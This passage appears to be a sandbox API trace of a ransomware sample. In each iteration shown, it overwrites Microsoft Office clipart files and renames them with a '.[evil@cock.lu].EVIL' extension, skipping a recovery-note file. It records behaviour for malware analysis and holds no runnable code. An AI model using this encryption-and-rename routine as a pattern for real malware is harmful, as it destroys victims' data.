(lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF", dwFileAttributes=0x200) returned 0 [0150.958] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.958] wcsstr (_Str="J0198016.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.958] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF") returned 69 [0150.958] wcscmp (_String1="J0198016.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.958] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198016.WMF") returned 0x0 [0150.958] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF") returned 0x45 [0150.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.961] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x849c, lpOverlapped=0x0) returned 1 [0150.968] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.968] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.968] _errno () returned 0x84b1160840 [0150.968] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.968] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x84a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x84a0, lpOverlapped=0x0) returned 1 [0150.969] CloseHandle (hObject=0x1a8) returned 1 [0150.969] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.969] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.969] __uncaught_exception () returned 0x84b1160800 [0150.969] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.969] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf.[evil@cock.lu].evil")) returned 1 [0150.971] ??_V@YAXPEAX@Z () returned 0x1 [0150.975] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF", dwFileAttributes=0x200) returned 0 [0150.976] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.976] wcsstr (_Str="J0198020.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.976] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF") returned 69 [0150.976] wcscmp (_String1="J0198020.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.976] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198020.WMF") returned 0x0 [0150.976] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF") returned 0x45 [0150.976] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.978] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5cae, lpOverlapped=0x0) returned 1 [0150.995] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.995] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.995] _errno () returned 0x84b1160840 [0150.995] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.995] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x5cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5cc0, lpOverlapped=0x0) returned 1 [0150.995] CloseHandle (hObject=0x1a8) returned 1 [0150.995] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.995] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.995] __uncaught_exception () returned 0x84b1160800 [0150.995] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.996] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf.[evil@cock.lu].evil")) returned 1 [0150.996] ??_V@YAXPEAX@Z () returned 0x1 [0150.999] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF", dwFileAttributes=0x200) returned 0 [0151.000] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.000] wcsstr (_Str="J0198021.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.000] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF") returned 69 [0151.000] wcscmp (_String1="J0198021.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.000] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198021.WMF") returned 0x0 [0151.000] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF") returned 0x45 [0151.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.002] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8860, lpOverlapped=0x0) returned 1 [0151.012] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.012] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.012] _errno () returned 0x84b1160840 [0151.012] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.012] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x8880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8880, lpOverlapped=0x0) returned 1 [0151.012] CloseHandle (hObject=0x1a8) returned 1 [0151.012] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.013] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.013] __uncaught_exception () returned 0x84b1160800 [0151.013] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.013] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf.[evil@cock.lu].evil")) returned 1 [0151.014] ??_V@YAXPEAX@Z () returned 0x1 [0151.022] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF", dwFileAttributes=0x200) returned 0 [0151.023] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.023] wcsstr (_Str="J0198022.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.023] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF") returned 69 [0151.023] wcscmp (_String1="J0198022.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.023] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198022.WMF") returned 0x0 [0151.023] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF") returned 0x45 [0151.023] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.026] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6624, lpOverlapped=0x0) returned 1 [0151.035] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.035] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.036] _errno () returned 0x84b1160840 [0151.036] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.036] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x6640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6640, lpOverlapped=0x0) returned 1 [0151.036] CloseHandle (hObject=0x1a8) returned 1 [0151.036] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.037] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.037] __uncaught_exception () returned 0x84b1160800 [0151.037] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.037] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf.[evil@cock.lu].evil")) returned 1 [0151.038] ??_V@YAXPEAX@Z () returned 0x1 [0151.042] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF", dwFileAttributes=0x200) returned 0 [0151.042] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.042] wcsstr (_Str="J0198025.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.042] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF") returned 69 [0151.042] wcscmp (_String1="J0198025.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.042] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198025.WMF") returned 0x0 [0151.042] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF") returned 0x45 [0151.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.045] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3cce, lpOverlapped=0x0) returned 1 [0151.054] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.054] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.054] _errno () returned 0x84b1160840 [0151.055] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.055] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3ce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3ce0, lpOverlapped=0x0) returned 1 [0151.055] CloseHandle (hObject=0x1a8) returned 1 [0151.055] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.055] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.055] __uncaught_exception () returned 0x84b1160800 [0151.055] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.056] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf.[evil@cock.lu].evil")) returned 1 [0151.057] ??_V@YAXPEAX@Z () returned 0x1 [0151.060] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF", dwFileAttributes=0x200) returned 0 [0151.061] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.061] wcsstr (_Str="J0198102.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.061] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF") returned 69 [0151.061] wcscmp (_String1="J0198102.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.061] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198102.WMF") returned 0x0 [0151.061] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF") returned 0x45 [0151.061] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.072] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd6b4, lpOverlapped=0x0) returned 1 [0151.082] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.082] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.082] _errno () returned 0x84b1160840 [0151.082] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.082] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xd6c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd6c0, lpOverlapped=0x0) returned 1 [0151.082] CloseHandle (hObject=0x1a8) returned 1 [0151.083] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.083] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.083] __uncaught_exception () returned 0x84b1160800 [0151.083] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.083] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf.[evil@cock.lu].evil")) returned 1 [0151.085] ??_V@YAXPEAX@Z () returned 0x1 [0151.088] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF", dwFileAttributes=0x200) returned 0 [0151.089] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.089] wcsstr (_Str="J0198113.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.089] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF") returned 69 [0151.089] wcscmp (_String1="J0198113.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.089] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198113.WMF") returned 0x0 [0151.089] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF") returned 0x45 [0151.089] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.091] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa520, lpOverlapped=0x0) returned 1 [0151.101] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.101] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.101] _errno () returned 0x84b1160840 [0151.101] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.101] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xa540, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa540, lpOverlapped=0x0) returned 1 [0151.101] CloseHandle (hObject=0x1a8) returned 1 [0151.102] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.102] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.102] __uncaught_exception () returned 0x84b1160800 [0151.102] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.102] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf.[evil@cock.lu].evil")) returned 1 [0151.103] ??_V@YAXPEAX@Z () returned 0x1 [0151.107] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF", dwFileAttributes=0x200) returned 0 [0151.107] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.107] wcsstr (_Str="J0198226.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.107] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF") returned 69 [0151.107] wcscmp (_String1="J0198226.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.107] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198226.WMF") returned 0x0 [0151.107] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF") returned 0x45 [0151.107] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.110] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa3b2, lpOverlapped=0x0) returned 1 [0151.120] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.120] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.120] _errno () returned 0x84b1160840 [0151.120] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.121] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xa3c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa3c0, lpOverlapped=0x0) returned 1 [0151.121] CloseHandle (hObject=0x1a8) returned 1 [0151.121] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.121] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.121] __uncaught_exception () returned 0x84b1160800 [0151.121] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.122] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf.[evil@cock.lu].evil")) returned 1 [0151.123] ??_V@YAXPEAX@Z () returned 0x1 [0151.126] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF", dwFileAttributes=0x200) returned 0 [0151.127] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.127] wcsstr (_Str="J0198234.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF") returned 69 [0151.127] wcscmp 